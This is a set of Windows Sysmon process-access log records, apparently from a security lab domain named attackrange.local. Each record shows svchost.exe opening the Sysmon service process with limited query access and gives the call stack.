{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.599\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.599","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1395,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1396,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1397,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1398,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1399,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1400,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:15.615\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:15.615","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
